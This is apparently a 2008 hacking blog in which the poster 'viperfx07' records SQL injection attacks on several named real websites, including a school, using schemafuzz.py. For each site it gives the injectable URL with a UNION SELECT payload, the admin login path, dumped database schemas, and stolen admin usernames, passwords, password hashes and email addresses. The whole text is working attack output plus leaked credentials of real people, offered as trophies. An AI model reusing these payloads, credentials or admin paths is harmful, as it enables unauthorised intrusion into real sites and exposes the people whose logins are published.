[+] Evasion Used: "+" "--"
[+] 21:40:40
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: jmn1928_inixindo
User: jmn1928_mydb@localhost
Version: 5.0.51a-community

[Database]: jmn1928_inixindo
[Table: Columns]
[0]admin: username,password
[1]berita: noberita,tglberita,judul,kategori,headline,isiberita,gambar,pengirim
[2]berita_eng: noberita,tglberita,judul,kategori,headline,isiberita,gambar,pengirim
[3]bukutamu: nmr,nama,url,komentar,status,tglkirim
[4]counter: jmlkunjungan
[5]jadwal: id,bulan,training,bulan_eng
[6]mailist: nourut,email
[7]staff: id,jabatan,nama,email,handphone,hobbies,foto,cv,cv_eng

[-] [21:41:35]
[-] Total URL Requests 42
[-] Done


[+] URL:http://www.inixindojogja.com/detailnews.php?id=59+AND+1=2+UNION+SELECT+0,1,sqli,3,4,5,6,7--
[+] Evasion Used: "+" "--"
[+] 21:42:16
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: jmn1928_inixindo
User: jmn1928_mydb@localhost
Version: 5.0.51a-community
[+] Dumping data from database "jmn1928_inixindo" Table "admin"
[+] Column(s) ['username', 'password']
[+] Number of Rows: 1

[0] webadmin:webj0gja2006:webj0gja2006:

[-] [21:42:18]
[-] Total URL Requests 3
[-] Done

[SQLi] http://www.wiyoko.com

12:22 AM Posted by viperfx07 No comments


Tool --> schemafuzz.py v5.0
Admin loc --> http://wiyoko.com/admin/index.php
Admin usr:pwd --> admin:1111 (see others in the dump or above pic)
Dump:
[+] URL:http://wiyoko.com/detailnews.php?table=news&id=32+AND+1=2+UNION+SELECT+0,sqli,2,3,4--
[+] Evasion Used: "+" "--"
[+] 19:54:01
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: t61647_wiyoko
User: t61647_wiyoko@localhost
Version: 5.0.32-Debian_7etch6

[Database]: t61647_wiyoko
[Table: Columns]
[0]additional: id,title,description,date,image
[1]main: id,title,description,date,image
[2]news: id,title,description,date,image
[3]products: id,title,description,date,image
[4]user: id,name,username,password,date,status

[-] [19:54:16]
[-] Total URL Requests 28
[-] Done


[+] URL:http://wiyoko.com/detailnews.php?table=news&id=32+AND+1=2+UNION+SELECT+0,sqli,2,3,4--
[+] Evasion Used: "+" "--"
[+] 19:56:04
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: t61647_wiyoko
User: t61647_wiyoko@localhost
Version: 5.0.32-Debian_7etch6
[+] Dumping data from database "t61647_wiyoko" Table "user"
[+] Column(s) ['username', 'password']
[+] Number of Rows: 4

[0] mondro:b59c67bf196a4758191e42f76670ceba:
[1] heri:b59c67bf196a4758191e42f76670ceba:
[2] admin:b59c67bf196a4758191e42f76670ceba:
[3] Meiga Pra:cd166cb83d8c0c9739e48e1ff27ae193:cd166cb83d8c0c9739e48e1ff27ae193:

[-] [19:56:07]
[-] Total URL Requests 6
[-] Done

Sunday, October 12, 2008

[SQLi] http://www.icmcipanas.sch.id

1:49 AM Posted by viperfx07 No comments


Tool: schemafuzz.py v5.0
Admin loc --> http://www.icmcipanas.sch.id/cpanel/admin.php
Admin usr:pwd --> see above pic.
Dump:
[+] URL:http://www.icmcipanas.sch.id/news.php?p=detn&kode=46+AND+1=2+UNION+SELECT+0,sqli,2,3,4,5--
[+] Evasion Used: "+" "--"
[+] 21:22:53
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: t41437_icm
User: t41437_icm@localhost
Version: 5.0.32-Debian_7etch6-log

[Database]: t41437_icm
[Table: Columns]
[0]admin: id,nama,password,level,email,date,namatgs,passtgs,emailtgs
[1]alumni: id,nama,nm,email,alamat,tlp,angkatan,status,kerja,img
[2]banner: id,gambar,size
[3]berita: idnews,judul,isi,penulis,gambar,date
[4]cln_siswa: id,id_jenjang,nm_clnsiswa,jns_kelamin,tgl_lahir,bln_lahir,thn_lahir,tmp_lahir,tlp,status,almt,kota,kodepos,asl_sekolah,nm_sekolah,almt_sekolah,jenjang,nm_ayah,agm_ayah,pend_ayah,pekj_ayah,nm_ibu,agm_ibu,pend_ibu,pekj_ibu,almt_ortu,tanggal
[5]gambar: id,kategori,kode,img,status
[6]imtak: id,judul,isi,penulis,date
[7]jenjang: id,jenjang
[8]komentar: id,nama,email,tanggal,pesan
[9]kuis: idkuis,pelajaran,isi,penulis,kelas,date

[-] [21:24:25]
[-] Total URL Requests 80
[-] Done


[+] URL:http://www.icmcipanas.sch.id/news.php?p=detn&kode=46+AND+1=2+UNION+SELECT+0,sqli,2,3,4,5--
[+] Evasion Used: "+" "--"
[+] 21:24:40
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: t41437_icm
User: t41437_icm@localhost
Version: 5.0.32-Debian_7etch6-log

[Database]: t41437_icm
[Table: Columns]
[0]admin: id,nama,password,level,email,date,namatgs,passtgs,emailtgs
[1]alumni: id,nama,nm,email,alamat,tlp,angkatan,status,kerja,img
[2]banner: id,gambar,size
[3]berita: idnews,judul,isi,penulis,gambar,date
[4]cln_siswa: id,id_jenjang,nm_clnsiswa,jns_kelamin,tgl_lahir,bln_lahir,thn_lahir,tmp_lahir,tlp,status,almt,kota,kodepos,asl_sekolah,nm_sekolah,almt_sekolah,jenjang,nm_ayah,agm_ayah,pend_ayah,pekj_ayah,nm_ibu,agm_ibu,pend_ibu,pekj_ibu,almt_ortu,tanggal
[5]gambar: id,kategori,kode,img,status
[6]imtak: id,judul,isi,penulis,date
[7]jenjang: id,jenjang
[8]komentar: id,nama,email,tanggal,pesan
[9]kuis: idkuis,pelajaran,isi,penulis,kelas,date

[-] [21:25:09]
[-] Total URL Requests 80
[-] Done


[+] URL:http://www.icmcipanas.sch.id/news.php?p=detn&kode=46+AND+1=2+UNION+SELECT+0,sqli,2,3,4,5--
[+] Evasion Used: "+" "--"
[+] 21:26:04
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: t41437_icm
User: t41437_icm@localhost
Version: 5.0.32-Debian_7etch6-log
[+] Dumping data from database "t41437_icm" Table "admin"
[+] Column(s) ['nama', 'password', 'email', 'namatgs', 'passtgs', 'emailtgs']
[+] Number of Rows: 5

[0] mila:ciputat:milah_u@yahoo.com:NoDataInColumn:0:0:
[1] heri:adindaku:heri@yahoo.com:NoDataInColumn:0:0:
[2] aku:aku:aku@yahoo.com:NoDataInColumn:0:0:
[3] euse:eighty8:euse@icmcipanas.sch.id:NoDataInColumn:0:0:
[4] kerberos:webmaster:kerberos@icmcipanas.sch.id:NoDataInColumn:0:0:0:

[-] [21:26:07]
[-] Total URL Requests 7
[-] Done

Saturday, October 11, 2008

[SQLi] http://qbheadlines.com

1:54 AM Posted by viperfx07 No comments


Tool --> schemafuzz.py v5.0
Admin loc --> http://qbheadlines.com/admin/
Admin usr:pwd --> admin:qb09db08 (see dump for more)
Dump:
[+] URL:http://qbheadlines.com/index.php?cat=5+AND+1=2+UNION+SELECT+sqli,1,2,3,4,5,6,7,8,9--
[+] Evasion Used: "+" "--"
[+] 21:10:28
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: qbheadli_qb
User: qbheadli_qbadmin@localhost
Version: 5.0.51a-community

[Database]: qbheadli_qb
[Table: Columns]
[0]aosi_dalam_berita: bid,title,view,content,category,url,author,date,img,active
[1]article: aid,title,content,type,img,active
[2]article_dialog: aid,DIP,title,preview,content,type,img,active,date,url
[3]berita: bid,title,view,content,category,url,author,date,img,active
[4]berita_dialog: ids,DIP,title,view,content,category,url,author,date,img,active
[5]berita_osi: bid,title,view,content,category,url,author,date,img,active
[6]category: cat_id,cat_name
[7]category_dial: cat_id,cat_name
[8]category_osi: ids,cat_id,cat_name
[9]cerita_osi: DIP,DID,Nama,profile,Dept,Judul,Paparan,Img,tanya,jawab,id_tanya,profile_det,type,active
[10]cerita_osi_usul: DIP,DID,Nama,profile,Email,Judul,Paparan,Img,tanya,jawab,id_tanya,profile_det
[11]comment: cid,author,comments,bid,email
[12]comment_article: cid,author,label,comment,aid,email,date,catID
[13]commentd: cid,author,label,comment,did,email,date
[14]commentof: Id,label,comment,flag,img,date,author,email,id_s,id_t,cid
[15]commentosi: cid,author,label,comment,dip,email,date,PID
[16]date_sumber: content,sumber,date
[17]debate: did,title,title_pro,title_contra,author_pro,author_contra,content_pro,content_contra,date,img_pro,img_contra,PATH,status,title_pro2,author_pro2,content_pro2,img_pro2,title_pro3,author_pro3,content_pro3,img_pro3,title_contra2,author_contra2,content_contra2,img_contra2,title_contra3,author_contra3,content_contra3,img_contra3
[18]dialog: DIP,DID,Nama,profile,Dept,Judul,Paparan,Img,title,inisial,id_tanya,profile_det
[19]distro: id,judul,narasi,img,penulis,sumber,Tipe
[20]ebook: bid,judul_buku,narasi,img,date,penulis,sumber
[21]elearning: eid,judul_buku,narasi,img,date,penulis,sumber
[22]iklan: kid,category,iklan,date
[23]indeks: name,value,changes,persen
[24]isi_event: cid,author,label,comment,dip,email,date,PID
[25]jawab_qd: ids,ids_judul,jawaban,nama,email
[26]kirimcd: id,nama,email,alamat
[27]kurs: satuan,mata_uang,kurs_jual,kurs_beli
[28]opini: id,title,content,category,img,author,email,flag,date,judul
[29]osi: DIP,DID,Nama,profile,Dept,Judul,Paparan,Img,img2,tanya,jawab,id_tanya,profile_det
[30]param_row: param_id,param_name,count_row
[31]penyedia_jasa: id,nama,email,content,download,flag,jasa1,jasa2,jasa3,jasa4,jasa5,img1,img2,img3,img4,img5
[32]performa: pid,title,url
[33]poll: pollid,question,lastip,active
[34]poll_answers: answerid,pollid,answers,votes,result
[35]qbmember: id,email,nama,member
[36]qna: id_qna,judul,tanya_qna,jawab_qna,aid
[37]survey: pollid,question,lastip,active
[38]survey_answers: answerid,pollid,answers,votes,result
[39]tanggapan: pid,author,id_t,tanggapan,tanggapan_cont,email,date,did
[40]tanya_dial: Ids_tanya,Judul_tanya,pertanyaan,DIP,nama,id_jawab,email
[41]user: uname,pwd,type
[42]vArticle: aid,title,content,TYPE,active,img
[43]vArticle1: aid,title,content,TYPE,active,img
[44]vArticle2: aid,title,content,TYPE,active,img
[45]vBerita: bid,title,VIEW,content,category,url,author,date,img,active
[46]vBeritaUtamaCat1: bid,title,view,content,category,url,author,date,img,active,cat_id,cat_name
[47]vBeritaUtamaCat2: bid,title,view,content,category,url,author,date,img,active,cat_id,cat_name
[48]vBeritaUtamaCat3: bid,title,view,content,category,url,author,date,img,active,cat_id,cat_name
[49]vBeritaUtamaCat4: bid,title,view,content,category,url,author,date,img,active,cat_id,cat_name
[50]vBeritaUtamaCat5: bid,title,view,content,category,url,author,date,img,active,cat_id,cat_name
[51]vCategory: cat_id,cat_name
[52]vHeadlineUtama: bid,title,view,content,category,url,author,date,img,active,cat_id,cat_name
[53]vberitaCat: bid,title,view,content,category,url,author,date,img,active,cat_id,cat_name
[54]vberita_osi: bid,title,view,content,category,url,author,date,img,active
[55]weather: city,cuaca,temp1,temp2
[56]web_link: id,link,status
[57]web_link_osi: id,link,status

[Database]: qbheadli_qbtest
[Table: Columns]
[0]aosi_dalam_berita: bid,title,view,content,category,url,author,date,img,active
[1]article: aid,title,preview,content,type,img,active
[2]article_dialog: aid,DIP,title,preview,content,type,img,active,date,url
[3]article_opinion: aid,DIP,title,author,preview,content,type,img,active,date,url
[4]berita: bid,title,view,content,category,url,author,date,img,active
[5]berita_dialog: ids,DIP,title,view,content,category,url,author,date,img,active
[6]berita_opinion: bid,title,view,content,category,url,author,date,img,active
[7]berita_osi: bid,title,view,content,category,url,author,date,img,active
[8]berita_utama: bid,title,view,content,category,url,author,date,img,active
[9]category: cat_id,cat_name
[10]category_dial: cat_id,cat_name
[11]category_osi: ids,cat_id,cat_name
[12]cerita_osi: DIP,DID,Nama,profile,Dept,Judul,Paparan,Img,tanya,jawab,id_tanya,profile_det,type,active
[13]cerita_osi_usul: DIP,DID,Nama,profile,Email,Judul,Paparan,Img,tanya,jawab,id_tanya,profile_det
[14]comment: cid,author,comments,bid,DIP,email
[15]comment_article: cid,author,label,comment,aid,email,date,catID
[16]commentd: cid,author,label,comment,did,email,date
[17]commento: cid,author,label,comment,did,email,date
[18]commentof: Id,label,comment,flag,img,date,author,email,id_s,id_t,cid
[19]commentosi: cid,author,label,comment,dip,email,date,PID
[20]date_sumber: content,sumber,date
[21]debate: did,title,title_pro,title_contra,author_pro,author_contra,content_pro,content_contra,date,img_pro,img_contra,PATH,status,title_pro2,author_pro2,content_pro2,img_pro2,title_pro3,author_pro3,content_pro3,img_pro3,title_contra2,author_contra2,content_contra2,img_contra2,title_contra3,author_contra3,content_contra3,img_contra3
[22]dialog: DIP,DID,Nama,profile,Dept,Judul,Paparan,Img,title,inisial,id_tanya,profile_det,password
[23]distro: id,judul,narasi,img,penulis,sumber,Tipe
[24]ebook: bid,judul_buku,narasi,img,date,penulis,sumber
[25]elearning: eid,judul_buku,narasi,img,date,penulis,sumber
[26]h_opinion: DIP,DID,Nama,profile,Dept,Judul,Paparan,Img,title,inisial,id_tanya,profile_det,password
[27]iklan: kid,category,iklan,date
[28]indeks: name,value,changes,persen
[29]isi_event: cid,author,label,comment,dip,email,date,PID
[30]jawab_qd: ids,ids_judul,jawaban,nama,email
[31]kurs: satuan,mata_uang,kurs_jual,kurs_beli
[32]opini: id,title,content,category,img,author,email,flag,date,judul
[33]osi: DIP,DID,Nama,profile,Dept,Judul,Paparan,Img,img2,tanya,jawab,id_tanya,profile_det
[34]param_row: param_id,param_name,count_row
[35]performa: pid,title,url
[36]poll: pollid,question,lastip,active
[37]poll_answers: answerid,pollid,answers,votes,result
[38]qna: id_qna,judul,tanya_qna,jawab_qna,aid,DIP
[39]survey: pollid,question,lastip,active
[40]survey_answers: answerid,pollid,answers,votes,result
[41]tanggapan: pid,author,id_t,Judul,tanggapan,tanggapan_cont,email,date,did
[42]tanya_dial: Ids_tanya,Judul_tanya,pertanyaan,DIP,nama,id_jawab,email,code
[43]user: uname,pwd,type
[44]vArticle: aid,title,content,TYPE,active,img
[45]vBerita: bid,title,VIEW,content,category,url,author,date,img,active
[46]vBeritaDialog1: ids,DIP,title,view,content,category,url,author,date,img,active
[47]vBeritaUtamaCat1: bid,title,view,content,category,url,author,date,img,active,cat_id,cat_name
[48]vBeritaUtamaCat2: bid,title,view,content,category,url,author,date,img,active,cat_id,cat_name
[49]vBeritaUtamaCat3: bid,title,view,content,category,url,author,date,img,active,cat_id,cat_name
[50]vBeritaUtamaCat4: bid,title,view,content,category,url,author,date,img,active,cat_id,cat_name
[51]vBeritaUtamaCat5: bid,title,view,content,category,url,author,date,img,active,cat_id,cat_name
[52]vCategory: cat_id,cat_name
[53]vCeritaosi: aid,title,content,img,type
[54]vHeadlineUtama: bid,title,view,content,category,url,author,date,img,active,cat_id,cat_name
[55]vHeadlineopini: bid,title,view,content,category,url,author,date,img,active,cat_id,cat_name
[56]vberitaCat: bid,title,view,content,category,url,author,date,img,active,cat_id,cat_name
[57]vberita_osi: bid,title,view,content,category,url,author,date,img,active
[58]vwCategory: cat_id,cat_name
[59]weather: city,cuaca,temp1,temp2
[60]web_link: id,link,status
[61]web_link_osi: id,link,status

[Database]: qbheadli_qbtesten
[Table: Columns]
[0]aosi_dalam_berita: bid,title,view,content,category,url,author,date,img,active
[1]article: aid,title,preview,content,type,img,active
[2]article_dialog: aid,DIP,title,preview,content,type,img,active,date,url
[3]article_opinion: aid,DIP,title,author,preview,content,type,img,active,date,url
[4]berita: bid,title,view,content,category,url,author,date,img,active
[5]berita_dialog: ids,DIP,title,view,content,category,url,author,date,img,active
[6]berita_opinion: bid,title,view,content,category,url,author,date,img,active
[7]berita_osi: bid,title,view,content,category,url,author,date,img,active
[8]berita_utama: bid,title,view,content,category,url,author,date,img,active
[9]category: cat_id,cat_name
[10]category_dial: cat_id,cat_name
[11]category_osi: ids,cat_id,cat_name
[12]cerita_osi: DIP,DID,Nama,profile,Dept,Judul,Paparan,Img,tanya,jawab,id_tanya,profile_det,type,active
[13]cerita_osi_usul: DIP,DID,Nama,profile,Email,Judul,Paparan,Img,tanya,jawab,id_tanya,profile_det
[14]comment: cid,author,comments,bid,DIP,email
[15]comment_article: cid,author,label,comment,aid,email,date,catID
[16]commentd: cid,author,label,comment,did,email,date
[17]commento: cid,author,label,comment,did,email,date
[18]commentof: Id,label,comment,flag,img,date,author,email,id_s,id_t,cid
[19]commentosi: cid,author,label,comment,dip,email,date,PID
[20]date_sumber: content,sumber,date
[21]debate: did,title,title_pro,title_contra,author_pro,author_contra,content_pro,content_contra,date,img_pro,img_contra,PATH
[22]dialog: DIP,DID,Nama,profile,Dept,Judul,Paparan,Img,title,inisial,id_tanya,profile_det,password
[23]distro: id,judul,narasi,img,penulis,sumber,Tipe
[24]ebook: bid,judul_buku,narasi,img,date,penulis,sumber
[25]elearning: eid,judul_buku,narasi,img,date,penulis,sumber
[26]h_opinion: DIP,DID,Nama,profile,Dept,Judul,Paparan,Img,title,inisial,id_tanya,profile_det,password
[27]iklan: kid,category,iklan,date
[28]indeks: name,value,changes,persen
[29]isi_event: cid,author,label,comment,dip,email,date,PID
[30]jawab_qd: ids,ids_judul,jawaban,nama,email
[31]kurs: satuan,mata_uang,kurs_jual,kurs_beli
[32]opini: id,title,content,category,img,author,email,flag,date,judul
[33]opinion: did,title,title_pro,title_contra,author_pro,author_contra,content_pro,content_contra,date,img_pro,img_contra,PATH
[34]osi: DIP,DID,Nama,profile,Dept,Judul,Paparan,Img,tanya,jawab,id_tanya,profile_det
[35]param_row: param_id,param_name,count_row
[36]performa: pid,title,url
[37]poll: pollid,question,lastip,active
[38]poll_answers: answerid,pollid,answers,votes,result
[39]qna: id_qna,judul,tanya_qna,jawab_qna,aid,DIP
[40]survey: pollid,question,lastip,active
[41]survey_answers: answerid,pollid,answers,votes,result
[42]tanggapan: pid,author,id_t,Judul,tanggapan,tanggapan_cont,email,date,did
[43]tanya_dial: Ids_tanya,Judul_tanya,pertanyaan,DIP,nama,id_jawab,email,code
[44]user: uname,pwd,type
[45]vArticle: aid,title,content,TYPE,active,img
[46]vBerita: bid,title,VIEW,content,category,url,author,date,img,active
[47]vBeritaDialog1: ids,DIP,title,view,content,category,url,author,date,img,active
[48]vBeritaUtamaCat1: bid,title,view,content,category,url,author,date,img,active,cat_id,cat_name
[49]vBeritaUtamaCat2: bid,title,view,content,category,url,author,date,img,active,cat_id,cat_name
[50]vBeritaUtamaCat3: bid,title,view,content,category,url,author,date,img,active,cat_id,cat_name
[51]vBeritaUtamaCat4: bid,title,view,content,category,url,author,date,img,active,cat_id,cat_name
[52]vBeritaUtamaCat5: bid,title,view,content,category,url,author,date,img,active,cat_id,cat_name
[53]vCategory: cat_id,cat_name
[54]vCeritaosi: aid,title,content,img,type
[55]vHeadlineUtama: bid,title,view,content,category,url,author,date,img,active,cat_id,cat_name
[56]vberitaCat: bid,title,view,content,category,url,author,date,img,active,cat_id,cat_name
[57]vberita_osi: bid,title,view,content,category,url,author,date,img,active
[58]vwCategory: cat_id,cat_name
[59]weather: city,cuaca,temp1,temp2
[60]web_link: id,link,status
[61]web_link_osi: id,link,status

[Database]: qbheadli_qbtesting
[Table: Columns]
[0]FC_Customers: CustomerID,CompanyName,ContactName,ContactTitle,Address,City,Region,PostalCode,Country,Phone,Fax
[1]FC_Employees: EmployeeID,LastName,FirstName,Title,BirthDate,HireDate,Address,City,Region,PostalCode,Country,HomePhone,Extension,Photo,Notes,ReportsTo
[2]FC_OrderDetails: OrderID,ProductID,UnitPrice,Quantity,Discount
[3]FC_Orders: OrderID,CustomerID,EmployeeID,OrderDate,RequiredDate,ShippedDate,ShipVia,Freight,ShipName,ShipAddress,ShipCity,ShipRegion,ShipPostalCode,ShipCountry
[4]FC_Products: ProductID,ProductName,SupplierID,CategoryID,QuantityPerUnit,UnitPrice,UnitsInStock,UnitsOnOrder,ReorderLevel,Discontinued
[5]FC_Suppliers: SupplierID,CompanyName,ContactName,ContactTitle,Address,City,Region,PostalCode,Country,Phone,Fax
[6]aosi_dalam_berita: bid,title,view,content,category,url,author,date,img,active
[7]article: aid,title,author,preview,content,type,img,active,flag
[8]article_dialog: aid,DIP,title,preview,content,type,img,active,date,url
[9]berita: bid,title,view,content,category,url,author,date,img,active
[10]berita_bisnis: ids,DIP,title,view,content,category,url,author,date,img,active
[11]berita_dialog: ids,DIP,title,view,content,category,url,author,date,img,active
[12]berita_kandidat: ids,DIP,title,view,content,category,url,author,date,img,active
[13]berita_osi: bid,title,view,content,category,url,author,date,img,active
[14]berita_utama: bid,title,view,content,category,url,author,date,img,active
[15]bisnis: DIP,DID,Nama,profile,Dept,Judul,Paparan,Img,title,inisial,id_tanya,profile_det
[16]category: cat_id,cat_name
[17]category_dial: cat_id,cat_name
[18]category_kandidat: cat_id,cat_name
[19]category_osi: ids,cat_id,cat_name
[20]cerita_osi: DIP,DID,Nama,profile,Dept,Judul,Paparan,Img,tanya,jawab,id_tanya,profile_det,type,active
[21]cerita_osi_usul: DIP,DID,Nama,profile,Email,Judul,Paparan,Img,tanya,jawab,id_tanya,profile_det
[22]comment: cid,author,comments,bid,DIP,email
[23]comment_article: cid,author,label,comment,aid,email,date,catID
[24]commentbisnis: Id,label,comment,flag,img,date,author,email
[25]commentd: cid,author,label,judul,comment,did,email,date
[26]commentof: Id,label,comment,flag,img,date,author,email,id_s,id_t,cid
[27]commentosi: cid,author,label,comment,dip,email,date,PID
[28]customers: cartID,sku,name,price,date,quantity,total,options,uid,warna,no_invoice,kd_invoice,description
[29]d_forum: id_dforum,id_forum,email,nama,content,img
[30]date_sumber: content,sumber,date
[31]debate: did,title,title_pro,title_contra,author_pro,author_contra,content_pro,content_contra,date,img_pro,img_contra,PATH,id_t,status,title_pro2,author_pro2,content_pro2,img_pro2,title_pro3,author_pro3,content_pro3,img_pro3,title_contra2,author_contra2,content_contra2,img_contra2,title_contra3,author_contra3,content_contra3,img_contra3
[32]dialog: DIP,DID,Nama,profile,Dept,Judul,Paparan,Img,title,inisial,id_tanya,profile_det,password
[33]distro: id,judul,narasi,img,penulis,sumber,Tipe
[34]ebook: bid,judul_buku,narasi,img,date,penulis,sumber
[35]elearning: eid,judul_buku,narasi,img,date,penulis,sumber
[36]event_osi: id,title,detail,tgl,tempat,author,penyelenggara
[37]h_forum: id_forum,title,ket
[38]iklan: kid,category,iklan,date
[39]indeks: name,value,changes,persen
[40]isi_event: cid,author,label,comment,dip,email,date,PID
[41]jawab_kandidat: ids,ids_judul,jawaban,nama,email
[42]jawab_qd: ids,ids_judul,jawaban,nama,email
[43]kadidat_capress: DIP,DID,Nama,profile,Dept,Judul,Paparan,Img,title,inisial,id_tanya,profile_det
[44]kirimcd: id,nama,email,alamat
[45]kurs: satuan,mata_uang,kurs_jual,kurs_beli
[46]member_qb: id,nama,email
[47]opini: id,title,content,category,img,author,email,flag,date,judul
[48]options: prod_id,oname,id,optprice
[49]osi: DIP,DID,Nama,profile,Dept,Judul,Paparan,Img,img2,tanya,jawab,id_tanya,profile_det
[50]param_row: param_id,param_name,count_row
[51]penyedia_jasa: id,nama,email,content,download,flag,jasa1,jasa2,jasa3,jasa4,jasa5,img1,img2,img3,img4,img5
[52]performa: pid,title,url
[53]poll: pollid,question,lastip,active
[54]poll_answers: answerid,pollid,answers,votes,result
[55]products: sku,name,description,category,image,price,options,special
[56]qna: id_qna,judul,tanya_qna,jawab_qna,aid,DIP
[57]store_category: catid,catname,active,urut
[58]store_kirim_brg: id_kirim,email,nama,alamat,telepon,hp,no_invoice
[59]store_menu_kiri: menu_id,menu_name,type,link,urut
[60]store_subcategory: subcatid,subcatname,catid,active
[61]students: Name,Marks
[62]survey: pollid,question,lastip,active
[63]survey_answers: answerid,pollid,answers,votes,result
[64]tanggapan: pid,author,id_t,Judul,tanggapan,tanggapan_cont,email,date,did
[65]tanya_dial: Ids_tanya,Judul_tanya,pertanyaan,DIP,nama,id_jawab,email,code
[66]tanya_email: id,subj,header,body
[67]tanya_kandidat: Ids_tanya,Judul_tanya,pertanyaan,DIP,nama,id_jawab,email
[68]trainning_osi: id,title,detail,tgl,tempat,author,penyelenggara
[69]user: uname,pwd,type
[70]users: firstname,lastname,username,password,email,address,city,state,zipcode,phone,fax,uid,cc,cctype,ccexp,ccname
[71]vArticle: aid,title,content,TYPE,active,img
[72]vBerita: bid,title,VIEW,content,category,url,author,date,img,active
[73]vBeritaDialog1: ids,DIP,title,view,content,category,url,author,date,img,active
[74]vBeritaUtamaCat1: bid,title,view,content,category,url,author,date,img,active,cat_id,cat_name
[75]vBeritaUtamaCat2: bid,title,view,content,category,url,author,date,img,active,cat_id,cat_name
[76]vBeritaUtamaCat3: bid,title,view,content,category,url,author,date,img,active,cat_id,cat_name
[77]vBeritaUtamaCat4: bid,title,view,content,category,url,author,date,img,active,cat_id,cat_name
[78]vBeritaUtamaCat5: bid,title,view,content,category,url,author,date,img,active,cat_id,cat_name
[79]vCategory: cat_id,cat_name
[80]vCeritaosi: aid,title,content,img,type
[81]vHeadlineUtama: bid,title,view,content,category,url,author,date,img,active,cat_id,cat_name
[82]vberita_osi: bid,title,view,content,category,url,author,date,img,active
[83]weather: city,cuaca,temp1,temp2
[84]web_link: id,link,status
[85]web_link_osi: id,link,status

[Database]: qbheadli_qbtesting2
[Table: Columns]
[0]article: aid,title,preview,content,type,img,active
[1]article_dialog: aid,DIP,title,preview,content,type,img,active,date,url
[2]berita: bid,title,view,content,category,url,author,date,img,active
[3]berita_dialog: ids,DIP,title,view,content,category,url,author,date,img,active
[4]berita_osi: bid,title,view,content,category,url,author,date,img,active
[5]berita_utama: bid,title,view,content,category,url,author,date,img,active
[6]category: cat_id,cat_name
[7]category_dial: cat_id,cat_name
[8]category_osi: ids,cat_id,cat_name
[9]cerita_osi: DIP,DID,Nama,profile,Dept,Judul,Paparan,Img,tanya,jawab,id_tanya,profile_det,type,active
[10]cerita_osi_usul: DIP,DID,Nama,profile,Email,Judul,Paparan,Img,tanya,jawab,id_tanya,profile_det
[11]comment: cid,author,comments,bid,DIP,email
[12]commentd: cid,author,label,comment,did,email,date
[13]commentosi: cid,author,label,comment,dip,email,date,PID
[14]date_sumber: content,sumber,date
[15]debate: did,title,title_pro,title_contra,author_pro,author_contra,content_pro,content_contra,date,img_pro,img_contra,PATH
[16]dialog: DIP,DID,Nama,profile,Dept,Judul,Paparan,Img,title,inisial,id_tanya,profile_det,password
[17]distroadmins: id,nama,password,email,telepon,situs
[18]distroapplikasis: id,distrokategori_id,nama,email,situs,telepon,milis,mulaiproject,status,versi,deskripsi,lisensi,lokasi,created
[19]distrokategoris: id,nama,deskripsi,created
[20]distros: id,nama,produsen,logo,email,situs,telepon,milis,mulaiproject,status,versi,deskripsi,spesifikasi,lokasi,created
[21]distrousers: id,distro_id,distroadmin_id
[22]ebook: bid,judul_buku,narasi,img,date,penulis,sumber
[23]elearning: eid,judul_buku,narasi,img,date,penulis,sumber
[24]iklan: kid,category,iklan,date
[25]indeks: name,value,changes,persen
[26]isi_event: cid,author,label,comment,dip,email,date,PID
[27]jawab_qd: ids,ids_judul,jawaban,nama,email
[28]kurs: satuan,mata_uang,kurs_jual,kurs_beli
[29]osi: DIP,DID,Nama,profile,Dept,Judul,Paparan,Img,tanya,jawab,id_tanya,profile_det
[30]param_row: param_id,param_name,count_row
[31]performa: pid,title,url
[32]poll: pollid,question,lastip,active
[33]poll_answers: answerid,pollid,answers,votes,result
[34]qna: id_qna,judul,tanya_qna,jawab_qna,aid,DIP
[35]survey: pollid,question,lastip,active
[36]survey_answers: answerid,pollid,answers,votes,result
[37]tanggapan: pid,author,id_t,Judul,tanggapan,tanggapan_cont,email,date,did
[38]tanya_dial: Ids_tanya,Judul_tanya,pertanyaan,DIP,nama,id_jawab,email,code
[39]user: uname,pwd,type
[40]vArticle: aid,title,content,TYPE,active,img
[41]vBerita: bid,title,VIEW,content,category,url,author,date,img,active
[42]vBeritaDialog1: ids,DIP,title,view,content,category,url,author,date,img,active
[43]vCategory: cat_id,cat_name
[44]vCeritaosi: aid,title,content,img,type
[45]vHeadlineUtama: bid,title,view,content,category,url,author,date,img,active
[46]vberita_osi: bid,title,view,content,category,url,author,date,img,active
[47]weather: city,cuaca,temp1,temp2
[48]web_link: id,link,status
[49]web_link_osi: id,link,status

[-] [21:42:51]
[-] Total URL Requests 2457
[-] Done


[+] URL:http://qbheadlines.com/index.php?cat=5+AND+1=2+UNION+SELECT+sqli,1,2,3,4,5,6,7,8,9--
[+] Evasion Used: "+" "--"
[+] 21:49:51
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: qbheadli_qb
User: qbheadli_qbadmin@localhost
Version: 5.0.51a-community
[+] Dumping data from database "qbheadli_qb" Table "user"
[+] Column(s) ['uname', 'pwd']
[+] Number of Rows: 3

[0] admin:qb09db08:
[1] invest:invest:
[2] adminos:qb09db08:qb09db08:

[-] [21:49:56]
[-] Total URL Requests 5
[-] Done